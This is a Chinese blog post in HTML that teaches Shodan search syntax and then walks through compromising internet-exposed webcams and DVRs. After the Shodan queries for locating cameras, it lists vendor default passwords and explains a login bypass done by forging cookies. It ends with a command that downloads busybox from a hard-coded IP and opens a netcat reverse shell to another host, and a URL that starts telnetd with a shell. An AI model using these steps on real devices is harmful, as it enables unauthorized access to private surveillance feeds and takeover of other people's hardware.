<!DOCTYPE html>
<html lang="en">
<head>

<!-- 爆炸红心效果 -->
<canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 10; pointer-events: none;" ></canvas> 
<script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
<script type="text/javascript" src="/js/firework.js"></script>

  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="theme-color" content=#58b77a>
  <title>shodan的基础使用以及一次摄像头渗透 | lcs</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="author" content="低谷时读书">
  <meta name="keywords" content="">
  <meta name="description" content="">
  <script id="hexo-configurations">
  var CONFIG = {
    root: '/',
    theme: 'hexo-theme-lx',
    version: '0.3.9',
    localsearch:{
      "enable": false,
      "trigger": "auto",
      "top_n_per_article": 1,
      "unescape": false,
      "preload": false
      },
    path: 'null'
  };
</script>

  <link rel="shortcut icon" href="/favicon.ico">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/theme-lx@0.3.9/source/css/main.min.css">
  <style type="text/css">
    pre,
    code {
      font-family: 'Fira Code', monospace;
    }
    html {
      font-family: sans-serif;
    }
    body {
      font-family: sans-serif;
    }
    h1, h2, h3, h4, h5, figure {
      font-family: sans-serif;
    }
    .menu-container{
      font-family: sans-serif;
    }
  </style>

  <script src="//cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/theme-lx@0.3.9/source/js/jquery.jside.menu.js"></script>
	<script>
	$(document).ready(function(){
	$(".menu-container").jSideMenu({
	    jSidePosition: "position-right",
	    jSideSticky: true,
	    jSideSkin: "greenish",
	     });
	}); 
	</script>
  <!--baidu_analytics-->
<script>
  var _hmt = _hmt || [];
  (function() {
    var hm = document.createElement("script");
    hm.src = "https://hm.baidu.com/hm.js?9133112840116d54bc311f72dbbd281e";
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(hm, s);
  })();
</script>
  <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Fira Code:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4/css/font-awesome.min.css">
<meta name="generator" content="Hexo 4.2.0"></head>
<body>
<div class="single">

<div id="page">
<div id="lx-aside" style="background-image: url(//cdn.jsdelivr.net/npm/theme-lx@0.3.9/source/images/post_cover.jpeg)" data-stellar-background-ratio="0.5">
  <div class="overlay">
  <div class="page-title">
    <div class="avatar"><a href="/"><img src="/images/avatar.jpeg"></a></div>
    <span>2020-08-12</span>
    <h2>shodan的基础使用以...</h2>
    <div class="tags"><i class="fa fa-tag"></i><a class="tag-link" href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag">web安全</a></div>
    <div class="social-links">
    <a href="https://github.com/crockme" target="_blank"><i class="fa fa-github fa-fw"></i></a>
    <a href="mailto:154711335@qq.com" target="_blank"><i class="fa fa-envelope fa-fw"></i></a>
</div></div>
</div>
</div>

<div id="lx-main-content">
  <div class="lx-post">
    <div class="lx-entry padding">
      <div>
        <h2 id="什么是shodan"><a href="#什么是shodan" class="headerlink" title="什么是shodan"></a>什么是shodan</h2><p>首先，Shodan 是一个搜索引擎，但它与 Google 这种搜索网址的搜索引擎不同，Shodan 是用来搜索网络空间中在线设备的，你可以通过 Shodan 搜索指定的设备，或者搜索特定类型的设备，其中 Shodan 上最受欢迎的搜索内容是：webcam，linksys，cisco，netgear，SCADA等等。<br>那么 Shodan 是怎么工作的呢？Shodan 通过扫描全网设备并抓取解析各个设备返回的 banner 信息，通过了解这些信息 Shodan 就能得知网络中哪一种 Web 服务器是最受欢迎的，或是网络中到底存在多少可匿名登录的 FTP 服务器。</p>
<h2 id="Shodan一些常用的语法"><a href="#Shodan一些常用的语法" class="headerlink" title="Shodan一些常用的语法"></a>Shodan一些常用的语法</h2><p>hostname：搜索指定的主机或域名。例如，hostname:”google”<br>port：搜索指定的端口或服务。例如， port:”21”<br>country：搜索指定的国家。例如， country:”CN”<br>city：搜索指定的城市。例如，city:”Hefei”<br>org：搜索指定的组织或公司。例如，org:”google”<br>isp：搜索指定的ISP供应商。例如， isp:”China Telecom”<br>product：搜索指定的操作系统/软件/平台。例如， product:”Apache httpd”<br>version：搜索指定的软件版本。例如， version:”1.6.2”<br>geo：搜索指定的地理位置，参数为经纬度。例如， geo:”31.8639,117.2808”<br>before/after：搜索指定收录时间前后的数据，格式为 dd-mm-yy。例如， before:”11-09-19”<br>net：搜索指定的IP地址或子网。例如，net:”210.45.240.0/24”</p>
<h2 id="shodan搜索例子"><a href="#shodan搜索例子" class="headerlink" title="shodan搜索例子"></a>shodan搜索例子</h2><p>1、查找位于合肥的Apache服务器<br>apache city:”Hefei”<br>2、查找位于国内的Nginx服务器<br>nginx country:”CN”<br>3、查找GWS（Gogle Web Server）服务器<br>server: gws hostname:”google”<br>4、查找指定网段华为设备<br>huawei net:”64.191.146.0/24”<br>Shodan怎样搜索摄像头?<br>shodan搜索网络摄像头也很简单，只要你知道这个摄像头是什么品牌？叫什么？它的Server服务名称是什么就可以了，以下给大家举两个简单的例子：<br>5、查找国内的 海康威视网络摄像头<br>Server: Hikvision-Webs country:”CN”<br>6、查找SQ-WEBCAM摄像头<br>Server: SQ-WEBCAM</p>
<h2 id="网络摄像头存在漏洞分析"><a href="#网络摄像头存在漏洞分析" class="headerlink" title="网络摄像头存在漏洞分析"></a>网络摄像头存在漏洞分析</h2><h4 id="1-存在弱口令漏洞"><a href="#1-存在弱口令漏洞" class="headerlink" title="1.存在弱口令漏洞"></a>1.存在弱口令漏洞</h4><p>   简称为“CCTV”（Mvpower 8 Channel Security DVR Full D1 H.264CCTV Real-time Network Digital Video Recorder Mobile Motion Detection,P2P HDMIAlarm Email for CCTV Surveillance Cmeras System）amazon购买地址<a href="http://www.amazon.co.uk/dp/B0162AQCO4，存在弱口令admin密码为空。收集的其它几款网络摄像机的口令如下：" target="_blank" rel="noopener">http://www.amazon.co.uk/dp/B0162AQCO4，存在弱口令admin密码为空。收集的其它几款网络摄像机的口令如下：</a><br> （1）海康威视IP网络摄像机：超级用户：admin，超级用户密码：12345。<br> （2）大华网络摄像机：用户名：admin，密码：888888。<br> （3）天地伟业网络摄像机：用户名：Admin，密码：111111</p>
<h4 id="2-登录密码绕过漏洞"><a href="#2-登录密码绕过漏洞" class="headerlink" title="2.登录密码绕过漏洞"></a>2.登录密码绕过漏洞</h4><p>   我们可以对之前用默认密码成功登录的页面进行抓包，找到处理页面登录逻辑的js，对处理页面登录的逻辑分析发现，存在登录绕过漏洞，代码如下：<br>$(document).ready(function(){</p>
<pre><code>dvr_camcnt= Cookies.get(&quot;dvr_camcnt&quot;);

iSetAble= Cookies.get(&quot;iSetAble&quot;);

iPlayBack= Cookies.get(&quot;iPlayBack&quot;);

dvr_usr= Cookies.get(&quot;dvr_usr&quot;);

dvr_pwd= Cookies.get(&quot;dvr_pwd&quot;);

if(iSetAble== &apos;0&apos;){

        $(&apos;#pb_settings&apos;).css(&apos;display&apos;,&apos;none&apos;);

        }

if(iPlayBack== &apos;0&apos;){

        $(&apos;#pb_review&apos;).css(&apos;display&apos;,&apos;none&apos;);

        }

if(dvr_camcnt== null || dvr_usr == null || dvr_pwd == null)

{

        location.href= &quot;/index.html&quot;;

}</code></pre><p>   系统管理页面直接通过js检查cookie是否为空来判断用户是否登录。现在竟然还有程序员这样来写登录状态判断。<br>   于是，通过伪造cookie便可以绕过登录检查。通过代码可以看到需要伪造三个cookie值，dvr_camcnt，dvr_usr=admin，dvr_pwd=123。直接打开<a href="http://xx.xx.xx.xx/view2.html时，抓包发现系统会自动设置该cookie参数的值，这个值需要记录下来，否则后面填错的话是看不到监控内容的。dvr_usr和dvr_pwd可以随便设置，只要不为空就好，如图1所示。保存后，重新刷新一下http://xx.xx.xx.xx/view2.html，便可以成功登录系统。" target="_blank" rel="noopener">http://xx.xx.xx.xx/view2.html时，抓包发现系统会自动设置该cookie参数的值，这个值需要记录下来，否则后面填错的话是看不到监控内容的。dvr_usr和dvr_pwd可以随便设置，只要不为空就好，如图1所示。保存后，重新刷新一下http://xx.xx.xx.xx/view2.html，便可以成功登录系统。</a></p>
<h4 id="3-获取反弹shell"><a href="#3-获取反弹shell" class="headerlink" title="3.获取反弹shell"></a>3.获取反弹shell</h4><p>执行以下命令：<br>cd/root/rec/a1 &amp;&amp; wget <a href="http://212.111.43.161/busybox" target="_blank" rel="noopener">http://212.111.43.161/busybox</a> &amp;&amp;chmod +xbusybox&amp;&amp; ./busybox  nc 122.115.47.398000 -e /bin/sh -e /bin/sh，将反弹shell至122.115.47.39的8000端口。还可以执行命令“<a href="http://www.antian365.com/shell?/usr/sbin/telnetd-l/bin/sh" target="_blank" rel="noopener">http://www.antian365.com/shell?/usr/sbin/telnetd-l/bin/sh</a> -p 25”通过telnet 目标IP直接进入系统。</p>

      </div>
    </div>
  </div>
</div>
<div class="lx-navigation">
	<div class="lx-cover prev lx-cover-sm" style="background-image: url(//cdn.jsdelivr.net/npm/theme-lx@0.3.9/source/images/footer-l.jpeg)">
		<div class="overlay"></div>
		<a class="copy" href="#">
			<div class="display-t">
				<div class="display-tc">
					<div>
						<span>Next</span>
						<h3>No newer post</h3>
					</div>
				</div>
			</div>
		</a>
	</div>
        <div class="lx-cover next lx-cover-sm" style="background-image: url(//cdn.jsdelivr.net/npm/theme-lx@0.3.9/source/images/footer-r.jpeg)">
		<div class="overlay"></div>
		<a class="copy" href="/2020/06/15/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%91%84%E5%83%8F%E5%A4%B4%E6%B8%97%E9%80%8F/">
			<div class="display-t">
				<div class="display-tc">
					<div>
						<span>Prev</span>
						<h3>记一次摄像头渗透</h3>
					</div>
				</div>
			</div>
		</a>
	</div>
</div>

</div>
<div class="comment"><div id="comments"></div></div>
<footer>
  <div>
  Copyright &copy; 2019.<a href="/">lcs</a><br>Powered by <a href="https://hexo.io" target="_blank">Hexo</a> | Theme <a href="https://lx.js.org" target="_blank">Lx</a><br>
 
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
 </div>
 </footer>



</div>

<button class="hamburger hamburger--arrow-r" type="button">
    <div class="hamburger-box">
      <div class="hamburger-inner"></div>
    </div>
</button> 
<div class="menu visibility">
  <div class="menu-head">
    <span class="layer">
      <div class="col">
        <div class="row for-pic">
          <div class="profile-pic">
            <a href="/"><img src="/images/avatar.jpeg" alt="低谷时读书"/></a>
          </div>
        </div>
        <div class="row for-name">
          <p>低谷时读书</p>
          <span class="tagline">Hello, World!</span>
        </div>
      </div>
    </span>
  </div>
  <nav class="menu-container">
  <ul class="menu-items">
    <li><a href="/"><i class="fa fa-home fa-fw"></i>Home</a></li>
    <li><a href="/archives/"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
    
    <li class="has-sub"><span class="dropdown-heading">
      <i class="fa fa-bookmark fa-fw"></i>Pages</span>
        <ul>
          <li><a href="/guestbook/">Guestbook</a></li>
        <li><a href="/pet/">Pet</a></li>
        <li><a href="/demo/">Emoji</a></li>
        <li><a href="/game/">Game</a></li>
        <li><a href="/about/">About</a></li>
        </ul>
    </li>
    <li class="has-sub"><span class="dropdown-heading">
      <i class="fa fa-link fa-fw"></i>Friends</span>
        <ul>
          <li> <a href="https://0sec.com.cn" target="_blank">Hacker鑫</a></li>
        </ul>
    </li>
  </ul>
  </nav>
</div>

<div class="gototop js-top">
  <a href="#" class="js-gotop"><i class="fa fa-arrow-up"></i></a>
</div>
<script src="//cdn.jsdelivr.net/npm/theme-lx@0.3.9/source/js/jquery.easing.min.js"></script>
<script>
(function () {
	"use strict";
	var goToTop = function() {
		$(".js-gotop").on("click", function(event){
			event.preventDefault();
			$("html, body").animate({
				scrollTop: $("html").offset().top
			}, 500, "easeInOutExpo");
			return false;
		});
		$(window).scroll(function(){
			var $win = $(window);
			if ($win.scrollTop() > 200) {
				$(".js-top").addClass("active");
			} else {
				$(".js-top").removeClass("active");
			}
		});
	};
	$(function(){
		goToTop();
	});
}());
</script>

<script src="//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js"></script>
<script>
  var GUEST = ['nick', 'mail', 'link'];
  var guest = 'nick,mail,link';
  guest = guest.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#comments',
    verify: false,
    notify: false,
    appId: 'xoQo7OmkE5wyp2cxwJR53BoV-gzGzoHsz',
    appKey: 'qz6i4M1xImso8bhvE4qLjrEh',
    placeholder: 'Say something.',
    avatar: 'identicon',
    meta: guest,
    pageSize: '10' || 10,
    lang: 'en' || 'zh-cn'
  });
</script>

</body>
</html>
